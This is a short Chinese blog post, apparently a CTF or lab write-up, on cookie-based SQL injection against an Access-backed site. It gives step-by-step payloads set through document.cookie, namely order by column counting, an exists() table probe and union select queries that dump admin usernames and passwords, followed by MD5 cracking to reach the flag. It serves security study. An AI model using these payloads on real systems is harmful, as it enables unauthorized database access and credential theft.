Access-Cookie注入

地址:http://59.63.200.79:8004/

Access-cookie注入
首先尝试显错注入或者别的 加引号测试:


可能存在过滤非法字符,发现无法直接进行SQL注入:上面的字符不能出现,我们可以使用order by 判断字段数:?id=171 order by 11 ?id=171 order by 10


说明存在十个字段。
通过cookie修改页面id:document.cookie=”id=169”


发现cookie可以传参,在尝试cookie是否会被过滤:document.cookie=”id=”+escape(“171 and 1=2”)


发现cookie没有被过滤 存在注入可能性:查询admin表是否存在:exists()判断是否括号里存在查询到的东西:document.cookie=”id=”+escape(“171 and exists(select * from admin )”)


发现可以正常执行,说明存在admin表,然后我们之前还知道了字段数为十,接下来寻找回显点,使用联合查询:document.cookie=”id=”+escape(“171 union select 1,2,3,4,5,6,7,8,9,10 from admin “)


然后根据显错点输出密码账号:document.cookie=”id=”+escape(“171 union select 1,2,3,4,5,6,username,password,9,10 from admin “)


密码使用MD5解密:b9a2a2b5dffb918c


输入后台 获得flag.

 

 

posted @ 2019-10-13 15:32  求知鱼  阅读(401)  评论(0编辑  收藏  举报